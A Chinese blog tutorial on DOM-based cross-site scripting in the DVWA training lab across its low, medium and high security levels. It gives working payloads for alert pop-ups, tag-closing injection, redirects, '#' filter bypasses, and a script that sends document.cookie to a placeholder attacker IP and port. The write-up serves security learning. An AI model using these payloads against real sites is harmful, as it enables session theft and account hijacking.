DVWA之XSS跨站脚本攻击(DOM型)

DVWA之XSS跨站脚本攻击(DOM型)

DOM ——文本对象类型,通过修改js标签触发xss(个人理解)

低等级

1.弹窗

插入恶意代码:
直接嵌入:
在这里插入图片描述成功触发:
在这里插入图片描述查看前端代码,发现js代码被插入到 value 值中:
在这里插入图片描述
另一种方式
js代码:

</option></select><img src='' onerror=alert('xss')>

使用 < /option >< /select > 使其对应的标签闭合,再插入js代码弹窗:

在这里插入图片描述查看前端代码:
在这里插入图片描述

2.重定向

直接嵌入:

<script>window.location = "http://www.baidu.com"</script>

闭合前面的标签:

111</option></select><script>window.location = "http://www.baidu.com"</script>

3.获取cookie

使用 kali 进行监听:
在这里插入图片描述插入恶意代码,并触发xss:

<script src='http://xxxxx/a.js'></script>

脚本代码:

var img = new Image();
img.src='http://ip地址:端口/cookie.php?cookie='+document.cookie;

在这里插入图片描述成功获得cookie:
在这里插入图片描述

中等级

查看源码,看看和 low 级别有什么不同;发现不能使用 < script >标签。
在这里插入图片描述可以选择不使用该标签,或者使用 # :
在这里插入图片描述前端代码:
在这里插入图片描述发现 # 将前后分隔了,从而触发XSS。

获取cookie:
在这里插入图片描述

高等级

查看源码:白名单验证。
在这里插入图片描述
使用 # 绕过:
在这里插入图片描述
DVWA之XSS跨站脚本攻击(存储型).

DVWA之XSS跨站脚本攻击(反射型).

猜你喜欢

转载自blog.csdn.net/qq_45742511/article/details/113254664